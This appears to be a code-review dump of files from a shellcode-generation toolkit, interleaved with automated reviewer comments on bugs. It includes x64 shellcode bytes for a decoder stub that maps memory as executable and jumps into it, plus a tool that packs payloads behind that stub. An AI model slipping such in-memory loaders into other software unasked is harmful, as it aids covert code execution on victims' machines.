109 /* 00E5 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
110 /* 00E7 */ "\x31\xc0" /* xor eax, eax */
111 /* 00E9 */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
112 /* 00ED */ "\xff\x53\x58" /* call qword ptr [rbx + 0x58] */
113 /* 00F0 */ "\x89\x43\x44" /* mov dword ptr [rbx + 0x44], eax */
114 /* 00F3 */ "\x31\xd2" /* xor edx, edx */
115 /* 00F5 */ "\x48\x89\x53\x30" /* mov qword ptr [rbx + 0x30], rdx */
116 /* 00F9 */ "\x48\x89\x53\x28" /* mov qword ptr [rbx + 0x28], rdx */
117 /* 00FD */ "\x48\x89\x53\x38" /* mov qword ptr [rbx + 0x38], rdx */
118 /* 0101 */ "\x48\x8d\x4b\x38" /* lea rcx, qword ptr [rbx + 0x38] */
119 /* 0105 */ "\x48\x89\x4b\x20" /* mov qword ptr [rbx + 0x20], rcx */
120 /* 0109 */ "\x4d\x31\xc9" /* xor r9, r9 */
121 /* 010C */ "\x6a\x07" /* push 7 */
122 /* 010E */ "\x41\x58" /* pop r8 */
123 /* 0110 */ "\x92" /* xchg eax, edx */
124 /* 0111 */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
125 /* 0115 */ "\xff\x53\x68" /* call qword ptr [rbx + 0x68] */
126 /* 0118 */ "\x6a\x40" /* push 0x40 */
127 /* 011A */ "\x41\x59" /* pop r9 */
128 /* 011C */ "\x6a\x30" /* push 0x30 */
129 /* 011E */ "\x41\x58" /* pop r8 */
130 /* 0120 */ "\x49\xc1\xe0\x08" /* shl r8, 8 */
131 /* 0124 */ "\x8b\x53\x38" /* mov edx, dword ptr [rbx + 0x38] */
132 /* 0127 */ "\x31\xc9" /* xor ecx, ecx */
133 /* 0129 */ "\xff\x53\x60" /* call qword ptr [rbx + 0x60] */
134 /* 012C */ "\x48\x89\x43\x3c" /* mov qword ptr [rbx + 0x3c], rax */
135 /* 0130 */ "\x31\xd2" /* xor edx, edx */
136 /* 0132 */ "\x48\x89\x53\x30" /* mov qword ptr [rbx + 0x30], rdx */
137 /* 0136 */ "\x48\x89\x53\x28" /* mov qword ptr [rbx + 0x28], rdx */
138 /* 013A */ "\x48\x8d\x4b\x38" /* lea rcx, qword ptr [rbx + 0x38] */
139 /* 013E */ "\x48\x89\x4b\x20" /* mov qword ptr [rbx + 0x20], rcx */
140 /* 0142 */ "\x50" /* push rax */
141 /* 0143 */ "\x41\x59" /* pop r9 */
142 /* 0145 */ "\x6a\x07" /* push 7 */
143 /* 0147 */ "\x41\x58" /* pop r8 */
144 /* 0149 */ "\x8b\x53\x44" /* mov edx, dword ptr [rbx + 0x44] */
145 /* 014C */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
146 /* 0150 */ "\xff\x53\x68" /* call qword ptr [rbx + 0x68] */
147 /* 0153 */ "\x48\x8b\x43\x3c" /* mov rax, qword ptr [rbx + 0x3c] */
148 /* 0157 */ "\x48\x83\xc4\x78" /* add rsp, 0x78 */
149 /* 015B */ "\x5d" /* pop rbp */
150 /* 015C */ "\x5f" /* pop rdi */
151 /* 015D */ "\x5b" /* pop rbx */
152 /* 015E */ "\x5e" /* pop rsi */
153 /* 015F */ "\xff\xe0" /* jmp rax */
154 };
0
1
2 // test unit for decode.asm
3 // odzhan
4
5 #include <stdint.h>
6 #include <stdio.h>
7 #include <stdlib.h>
8 #include <string.h>
9 #include <sys/stat.h>
10 #include <inttypes.h>
11 #include <fcntl.h>
12
13 #if defined(_WIN32) || defined(_WIN64)
14 #define WINDOWS
15 #include <windows.h>
16 #include "mmap.h"
17 #if defined(_MSC_VER)
18 #pragma comment(lib, "advapi32.lib")
19 #pragma comment(lib, "user32.lib")
20 #pragma comment(lib, "crypt32.lib")
21 #endif
22 #else
23 #define LINUX
24 #include <unistd.h>
25 #include <sys/types.h>
26 #include <sys/mman.h>
27 #endif
28
29 #include "decode.h"
30
31 uint32_t hash_string(const char *str) {
32 char c;
33 uint32_t h = 0;
34
35 do {
36 c = *str++;
37 if(c == 0) break;
38 h += (c | 0x20);
39 h = (h << 32-8) | (h >> 8);
40 } while(c != 0);
41
42 return h;
43 }
44
45 void bin2hex(void *bin, int len) {
46 int i;
47 uint8_t *p=(uint8_t*)bin;
48
49 for(i=0; i<8; i++) printf(" %02x", p[i]);
50 }
51
52 int main(int argc, char *argv[]) {
53 struct stat fs;
54 int in;
55 FILE *out;
56 char *infile, *outfile;
57 DWORD inlen, outlen;
58 PVOID outbuf, inbuf;
59
60 if(argc != 3) {
61 printf("\nusage: encode <infile> <outfile>\n");
62 return 0;
63 }
64
65 infile = argv[1];
66 outfile = argv[2];
67
68 if(stat(infile, &fs) != 0) {
69 printf("unable to access %s\n", infile);
70 return -1;
71 }
72
73 in = open(infile, O_RDONLY);
74 if(in < 0) {
75 printf("unable to open %s.\n", infile);
76 return -1;
77 }
78
79 out = fopen(outfile, "wb");
80 if(out < 0) {
81 printf("unable to open %s for writing.\n", outfile);
82 close(in);
83 return -1;
84 }
85
86 inlen = fs.st_size;
87 inbuf = mmap(NULL, inlen, PROT_READ, MAP_PRIVATE, in, 0);
88
89 if(inbuf != NULL) {
90 outlen = 0;
91 if(CryptBinaryToString(inbuf, inlen,
92 CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &outlen))
93 {
94 outbuf = calloc(1, outlen + DECODE_SIZE + 8);
95 if(outbuf != NULL) {
96 if(CryptBinaryToString(inbuf, inlen,
97 CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, outbuf, &outlen))
98 {
99 fwrite(DECODE, 1, DECODE_SIZE, out);
100 fwrite(outbuf, 1, outlen, out);
101 } else {
102 printf("CryptBinaryToString failed.\n");
103 }
104 free(outbuf);
105 } else {
106 printf("unable to allocate memory.\n");
107 }
108 } else {
109 printf("unable to obtain length\n");
110 }
111 munmap(inbuf, inlen);
112 } else {
113 printf("unable to map\n");
114 }
115 fclose(out);
116 close(in);
117 return 0;
118 }
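Review bot: The failure check after `fopen` in main can never fire, because `out` is a `FILE *` and `fopen` reports failure with NULL; `if(out < 0)` should be `if(out == NULL)`, otherwise a failed open falls through to `fwrite` and `fclose` on a null stream. The mapping check has the same problem: the `mmap` replacement added in this commit returns `MAP_FAILED` (`(void *) -1`), as does the POSIX call, so `if(inbuf != NULL)` should be `if(inbuf != MAP_FAILED)`. Separately, `bin2hex` ignores its `len` argument and always prints 8 bytes; either loop to `len` or drop the parameter.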
Binary diff not shown
0 /* mmap() replacement for Windows
1 *
2 * Author: Mike Frysinger <[email protected]>
3 * Placed into the public domain
4 */
5
6 /* References:
7 * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
8 * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
9 * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
10 * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
11 */
12
13 #include "mmap.h"
14
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
16 {
17 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
18 return MAP_FAILED;
19 if (fd == -1) {
20 if (!(flags & MAP_ANON) || offset)
21 return MAP_FAILED;
22 } else if (flags & MAP_ANON)
23 return MAP_FAILED;
24
25 DWORD flProtect;
26 if (prot & PROT_WRITE) {
27 if (prot & PROT_EXEC)
28 flProtect = PAGE_EXECUTE_READWRITE;
29 else
30 flProtect = PAGE_READWRITE;
31 } else if (prot & PROT_EXEC) {
32 if (prot & PROT_READ)
33 flProtect = PAGE_EXECUTE_READ;
34 else if (prot & PROT_EXEC)
35 flProtect = PAGE_EXECUTE;
36 } else
37 flProtect = PAGE_READONLY;
38
39 off_t end = length + offset;
40 HANDLE mmap_fd, h;
41 if (fd == -1)
42 mmap_fd = INVALID_HANDLE_VALUE;
43 else
44 mmap_fd = (HANDLE)_get_osfhandle(fd);
45 h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
46 if (h == NULL)
47 return MAP_FAILED;
48
49 DWORD dwDesiredAccess;
50 if (prot & PROT_WRITE)
51 dwDesiredAccess = FILE_MAP_WRITE;
52 else
53 dwDesiredAccess = FILE_MAP_READ;
54 if (prot & PROT_EXEC)
55 dwDesiredAccess |= FILE_MAP_EXECUTE;
56 if (flags & MAP_PRIVATE)
57 dwDesiredAccess |= FILE_MAP_COPY;
58 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
59 if (ret == NULL) {
60 ret = MAP_FAILED;
61 }
62 CloseHandle(h);
63 return ret;
64 }
65
66 void munmap(void *addr, size_t length)
67 {
68 UnmapViewOfFile(addr);
69 }
70
71 #undef DWORD_HI
72 #undef DWORD_LO
0
1
2 #ifndef MMAP_H
3 #define MMAP_H
4
5 #include <io.h>
6 #include <windows.h>
7 #include <sys/types.h>
8
9 #define PROT_READ 0x1
10 #define PROT_WRITE 0x2
11 /* This flag is only available in WinXP+ */
12 #ifdef FILE_MAP_EXECUTE
13 #define PROT_EXEC 0x4
14 #else
15 #define PROT_EXEC 0x0
16 #define FILE_MAP_EXECUTE 0
17 #endif
18
19 #define MAP_SHARED 0x01
20 #define MAP_PRIVATE 0x02
21 #define MAP_ANONYMOUS 0x20
22 #define MAP_ANON MAP_ANONYMOUS
23 #define MAP_FAILED ((void *) -1)
24
25 #ifdef __USE_FILE_OFFSET64
26 # define DWORD_HI(x) (x >> 32)
27 # define DWORD_LO(x) ((x) & 0xffffffff)
28 #else
29 # define DWORD_HI(x) (0)
30 # define DWORD_LO(x) (x)
31 #endif
32
33 #ifdef __cplusplus
34 extern "C" {
35 #endif
36
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
39
40 #ifdef __cplusplus
41 }
42 #endif
43
44 #endif
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <stdio.h>
32 #include <string.h>
33 #include <stdlib.h>
34 #include <stdint.h>
35 #include <ctype.h>
36
37 #include <fcntl.h>
38 #include <errno.h>
39 #include <sys/types.h>
40 #include <sys/stat.h>
41
42 #if defined(_WIN32) || defined(_WIN64)
43 #define WINDOWS
44 #include <windows.h>
45 #include <shlwapi.h>
46 #include "mmap.h"
47 #pragma comment(lib, "shlwapi.lib")
48 #else
49 #define NIX
50 #include <libgen.h>
51 #include <sys/mman.h>
52 #include <unistd.h>
53 #include <pe.h>
54 #endif
55
56 // return pointer to DOS header
57 PIMAGE_DOS_HEADER DosHdr(void *map) {
58 return (PIMAGE_DOS_HEADER)map;
59 }
60
61 // return pointer to NT header
62 PIMAGE_NT_HEADERS NtHdr (void *map) {
63 return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew);
64 }
65
66 // return pointer to File header
67 PIMAGE_FILE_HEADER FileHdr (void *map) {
68 return &NtHdr(map)->FileHeader;
69 }
70
71 // determines CPU architecture of binary
72 int is32 (void *map) {
73 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386;
74 }
75
76 // determines CPU architecture of binary
77 int is64 (void *map) {
78 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_AMD64;
79 }
80
81 // return pointer to Optional header
82 void* OptHdr (void *map) {
83 return (void*)&NtHdr(map)->OptionalHeader;
84 }
85
86 // return pointer to first section header
87 PIMAGE_SECTION_HEADER SecHdr (void *map) {
88 PIMAGE_NT_HEADERS nt = NtHdr(map);
89
90 return (PIMAGE_SECTION_HEADER)((uint8_t*)&nt->OptionalHeader +
91 nt->FileHeader.SizeOfOptionalHeader);
92 }
93
94 uint32_t DirSize (void *map) {
95 if (is32(map)) {
96 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->NumberOfRvaAndSizes;
97 } else {
98 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->NumberOfRvaAndSizes;
99 }
100 }
101
102 uint32_t SecSize (void *map) {
103 return NtHdr(map)->FileHeader.NumberOfSections;
104 }
105
106 PIMAGE_DATA_DIRECTORY Dirs (void *map) {
107 if (is32(map)) {
108 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory;
109 } else {
110 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory;
111 }
112 }
113
114 uint64_t ImgBase (void *map) {
115 if (is32(map)) {
116 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->ImageBase;
117 } else {
118 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->ImageBase;
119 }
120 }
121
122 // valid dos header?
123 int valid_dos_hdr (void *map) {
124 PIMAGE_DOS_HEADER dos = DosHdr(map);
125
126 if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0;
127 return (dos->e_lfanew != 0);
128 }
129
130 // valid nt headers
131 int valid_nt_hdr (void *map) {
132 return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
133 }
134
135 uint32_t rva2ofs (void *map, uint32_t rva) {
136 int i;
137
138 PIMAGE_SECTION_HEADER sh = SecHdr(map);
139
140 for (i=0; i<SecSize(map); i++) {
141 if (rva >= sh[i].VirtualAddress && rva < sh[i].VirtualAddress + sh[i].SizeOfRawData)
142 return sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
143 }
144 return -1;
145 }
146
147 void bin2h(void *map, char *fname, void *bin, uint32_t len) {
148 char label[32], file[32], *str;
149 uint32_t i;
150 uint8_t *p=(uint8_t*)bin;
151 FILE *fd;
152
153 memset(label, 0, sizeof(label));
154 memset(file, 0, sizeof(file));
155
156 #if defined(WINDOWS)
157 str = PathFindFileName(fname);
158 #else
159 str = basename(fname);
160 #endif
161 for(i=0; str[i] != 0 && i < 16;i++) {
162 if(str[i] == '.') {
163 file[i] = label[i] = '_';
164 } else {
165 label[i] = toupper(str[i]);
166 file[i] = tolower(str[i]);
167 }
168 }
169 if(map != NULL) {
170 strcat(label, is32(map) ? "_X86" : "_X64");
171 strcat(file, is32(map) ? "_x86" : "_x64");
172 }
173 strcat(file, ".h");
174
175 fd = fopen(file, "wb");
176
177 if(fd != NULL) {
178 fprintf(fd, "\nunsigned char %s[] = {", label);
179
180 for(i=0;i<len;i++) {
181 if(!(i % 12)) fprintf(fd, "\n ");
182 fprintf(fd, "0x%02x", p[i]);
183 if((i+1) != len) fprintf(fd, ", ");
184 }
185 fprintf(fd, "};\n\n");
186 fclose(fd);
187 printf(" [ saved code to %s\n", file);
188 } else printf(" [ unable to create file : %s\n", file);
189 }
190
191 void bin2go(void* map, char* fname, void* bin, uint32_t len) {
192 char label[32], file[32], * str;
193 uint32_t i;
194 uint8_t* p = (uint8_t*)bin;
195 FILE* fd;
196
197 memset(label, 0, sizeof(label));
198 memset(file, 0, sizeof(file));
199
200 #if defined(WINDOWS)
201 str = PathFindFileName(fname);
202 #else
203 str = basename(fname);
204 #endif
205 for (i = 0; str[i] != 0 && i < 16; i++) {
206 if (str[i] == '.') {
207 file[i] = label[i] = '_';
208 }
209 else {
210 label[i] = toupper(str[i]);
211 file[i] = tolower(str[i]);
212 }
213 }
214 if (map != NULL) {
215 strcat(label, is32(map) ? "_X86" : "_X64");
216 strcat(file, is32(map) ? "_x86" : "_x64");
217 }
218 strcat(file, ".go");
219
220 fd = fopen(file, "wb");
221
222 if (fd != NULL) {
223 fprintf(fd, "package donut\n\n// %s - stub for EXE PE files\nvar %s = []byte{\n", label, label);
224
225 for (i = 0; i < len; i++) {
226 if (!(i % 12)) fprintf(fd, "\n ");
227 fprintf(fd, "0x%02x", p[i]);
228 if ((i + 1) != len) fprintf(fd, ", ");
229 }
230 fprintf(fd, "};\n\n");
231 fclose(fd);
232 printf(" [ saved code to %s\n", file);
233 }
234 else printf(" [ unable to create file : %s\n", file);
235 }
236
237
238 /**
239 void bin2array(void *map, char *fname, void *bin, uint32_t len) {
240 char label[32], file[32], *str;
241 uint32_t i;
242 uint32_t *p=(uint32_t*)bin;
243 FILE *fd;
244
245 memset(label, 0, sizeof(label));
246 memset(file, 0, sizeof(file));
247
248 #if defined(WINDOWS)
249 str = PathFindFileName(fname);
250 #else
251 str = basename(fname);
252 #endif
253 for(i=0; str[i] != 0 && i < 16;i++) {
254 if(str[i] == '.') {
255 file[i] = label[i] = '_';
256 } else {
257 label[i] = toupper(str[i]);
258 file[i] = tolower(str[i]);
259 }
260 }
261
262 strcat(file, ".h");
263
264 fd = fopen(file, "wb");
265
266 if(fd != NULL) {
267 // align up by 4
268 len = (len & -4) + 4;
269 len >>= 2;
270
271 // declare the array
272 fprintf(fd, "\nunsigned int %s[%i];\n\n", label, len);
273
274 // initialize array
275 for(i=0; i<len; i++) {
276 fprintf(fd, "%s[%i] = 0x%08" PRIX32 ";\n", label, i, p[i]);
277 }
278 fclose(fd);
279 printf(" [ Saved array to %s\n", file);
280 } else printf(" [ unable to create file : %s\n", file);
281 }
282 */
283 // structure of COFF (.obj) file
284
285 //--------------------------//
286 // IMAGE_FILE_HEADER //
287 //--------------------------//
288 // IMAGE_SECTION_HEADER //
289 // * num sections //
290 //--------------------------//
291 // //
292 // //
293 // //
294 // section data //
295 // * num sections //
296 // //
297 // //
298 //--------------------------//
299 // IMAGE_SYMBOL //
300 // * num symbols //
301 //--------------------------//
302 // string table //
303 //--------------------------//
304
305 int main (int argc, char *argv[]) {
306 int fd, i;
307 struct stat fs;
308 uint8_t *map, *cs;
309 PIMAGE_SECTION_HEADER sh;
310 //PIMAGE_FILE_HEADER fh;
311 //PIMAGE_COFF_SYMBOLS_HEADER csh;
312 uint32_t ofs, len;
313
314 if (argc != 2) {
315 printf ("\n [ usage: file2h <file.exe | file.bin>\n");
316 return 0;
317 }
318
319 // open file for reading
320 fd = open(argv[1], O_RDONLY);
321
322 if(fd == 0) {
323 printf(" [ unable to open %s\n", argv[1]);
324 return 0;
325 }
326 // if file has some data
327 if(fstat(fd, &fs) == 0) {
328 // map into memory
329 map = (uint8_t*)mmap(NULL, fs.st_size,
330 PROT_READ, MAP_PRIVATE, fd, 0);
331 if(map != NULL) {
332 if(valid_dos_hdr(map) && valid_nt_hdr(map)) {
333 printf(" [ Found valid DOS and NT header.\n");
334 // get the .text section
335 sh = SecHdr(map);
336 // if a section header was returned
337 if(sh != NULL) {
338 printf(" [ Locating .text section.\n");
339 // locate the .text section
340 for(i=0; i<SecSize(map); i++) {
341 if(strcmp((char*)sh[i].Name, ".text") == 0) {
342 ofs = rva2ofs(map, sh[i].VirtualAddress);
343
344 if(ofs != -1) {
345 cs = (map + ofs);
346 len = sh[i].Misc.VirtualSize;
347 // convert to header file
348 bin2h(map, argv[1], cs, len);
349 bin2go(map, argv[1], cs, len);
350 break;
351 }
352 }
353 }
354 }
355 } else {
356 printf(" [ No valid DOS or NT header found.\n");
357 // treat file as binary
358 bin2h(NULL, argv[1], map, fs.st_size);
359 bin2go(NULL, argv[1], map, fs.st_size);
360 //bin2array(NULL, argv[1], map, fs.st_size);
361 }
362 munmap(map, fs.st_size);
363 }
364 }
365 close(fd);
366 return 0;
367 }
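Review bot: Nothing in this file compares the PE fields it reads with `fs.st_size`, so a truncated or malformed input makes the tool read outside the mapping. `NtHdr` adds `e_lfanew` to `map` unchecked, the section loops trust `NumberOfSections`, and main hands `map + ofs` with `len = sh[i].Misc.VirtualSize` to `bin2h`/`bin2go` without bounding either value. Replacing `if(ofs != -1)` with `if(ofs != -1 && ofs <= fs.st_size && sh[i].Misc.VirtualSize <= fs.st_size - ofs)` would bound the copy, and main should reject an `e_lfanew` that leaves no room for the NT headers before calling `valid_nt_hdr`. The open and map checks are also wrong: `open` fails with -1 and `mmap` with `MAP_FAILED`, so `if(fd == 0)` should be `if(fd < 0)` and `if(map != NULL)` should be `if(map != MAP_FAILED)`.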
0 /* mmap() replacement for Windows
1 *
2 * Author: Mike Frysinger <[email protected]>
3 * Placed into the public domain
4 */
5
6 /* References:
7 * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
8 * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
9 * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
10 * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
11 */
12
13 #include "mmap.h"
14
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
16 {
17 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
18 return MAP_FAILED;
19 if (fd == -1) {
20 if (!(flags & MAP_ANON) || offset)
21 return MAP_FAILED;
22 } else if (flags & MAP_ANON)
23 return MAP_FAILED;
24
25 DWORD flProtect;
26 if (prot & PROT_WRITE) {
27 if (prot & PROT_EXEC)
28 flProtect = PAGE_EXECUTE_READWRITE;
29 else
30 flProtect = PAGE_READWRITE;
31 } else if (prot & PROT_EXEC) {
32 if (prot & PROT_READ)
33 flProtect = PAGE_EXECUTE_READ;
34 else if (prot & PROT_EXEC)
35 flProtect = PAGE_EXECUTE;
36 } else
37 flProtect = PAGE_READONLY;
38
39 off_t end = length + offset;
40 HANDLE mmap_fd, h;
41 if (fd == -1)
42 mmap_fd = INVALID_HANDLE_VALUE;
43 else
44 mmap_fd = (HANDLE)_get_osfhandle(fd);
45 h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
46 if (h == NULL)
47 return MAP_FAILED;
48
49 DWORD dwDesiredAccess;
50 if (prot & PROT_WRITE)
51 dwDesiredAccess = FILE_MAP_WRITE;
52 else
53 dwDesiredAccess = FILE_MAP_READ;
54 if (prot & PROT_EXEC)
55 dwDesiredAccess |= FILE_MAP_EXECUTE;
56 if (flags & MAP_PRIVATE)
57 dwDesiredAccess |= FILE_MAP_COPY;
58 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
59 if (ret == NULL) {
60 ret = MAP_FAILED;
61 }
62 CloseHandle(h);
63 return ret;
64 }
65
66 void munmap(void *addr, size_t length)
67 {
68 UnmapViewOfFile(addr);
69 }
70
71 #undef DWORD_HI
72 #undef DWORD_LO
0
1
2 #ifndef MMAP_H
3 #define MMAP_H
4
5 #include <io.h>
6 #include <windows.h>
7 #include <sys/types.h>
8
9 #define PROT_READ 0x1
10 #define PROT_WRITE 0x2
11 /* This flag is only available in WinXP+ */
12 #ifdef FILE_MAP_EXECUTE
13 #define PROT_EXEC 0x4
14 #else
15 #define PROT_EXEC 0x0
16 #define FILE_MAP_EXECUTE 0
17 #endif
18
19 #define MAP_SHARED 0x01
20 #define MAP_PRIVATE 0x02
21 #define MAP_ANONYMOUS 0x20
22 #define MAP_ANON MAP_ANONYMOUS
23 #define MAP_FAILED ((void *) -1)
24
25 #ifdef __USE_FILE_OFFSET64
26 # define DWORD_HI(x) (x >> 32)
27 # define DWORD_LO(x) ((x) & 0xffffffff)
28 #else
29 # define DWORD_HI(x) (0)
30 # define DWORD_LO(x) (x)
31 #endif
32
33 #ifdef __cplusplus
34 extern "C" {
35 #endif
36
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
39
40 #ifdef __cplusplus
41 }
42 #endif
43
44 #endif
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // Function to return the program counter.
32 // Always place this at the end of payload.
33 // Tested with x86 build of MSVC 2019 and MinGW. YMMV.
34 #if defined(_MSC_VER)
35 #if defined(_M_IX86)
36 __declspec(naked) char *get_pc(void) {
37 __asm {
38 call pc_addr
39 pc_addr:
40 pop eax
41 sub eax, 5
42 ret
43 }
44 }
45 #endif
46 #elif defined(__GNUC__)
47 #if defined(__i386__)
48 asm (
49 ".global get_pc\n"
50 ".global _get_pc\n"
51 "_get_pc:\n"
52 "get_pc:\n"
53 " call pc_addr\n"
54 "pc_addr:\n"
55 " pop eax\n"
56 " sub eax, 5\n"
57 " ret\n"
58 );
59 #endif
60 #endif
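Review bot: Both `get_pc` bodies lack a comment explaining why 5 is subtracted and which targets the file covers. A line such as `// call rel32 is 5 bytes long, so (return address - 5) is the address of get_pc itself` above `sub eax, 5` would make the arithmetic checkable. The GNU branch is written in Intel operand order (`pop eax`, `sub eax, 5`) with no syntax directive inside the string, so it presumably relies on a build flag set elsewhere; a one-line note naming that requirement would help. The header comment should also state that nothing is defined when the target is not 32-bit x86.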
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL DownloadFromHTTP(PDONUT_INSTANCE inst) {
32 HINTERNET hin, con, req;
33 PBYTE inbuf=NULL;
34 DWORD chunklen, pos, res, inlen, s, n, rd, len, code=0;
35 BOOL bResult = FALSE, bSecure = FALSE, bIgnore = TRUE;
36 URL_COMPONENTS uc;
37 CHAR host[MAX_PATH],
38 file[MAX_PATH],
39 username[64], password[64];
40 SIZE_T rs;
41 NTSTATUS status;
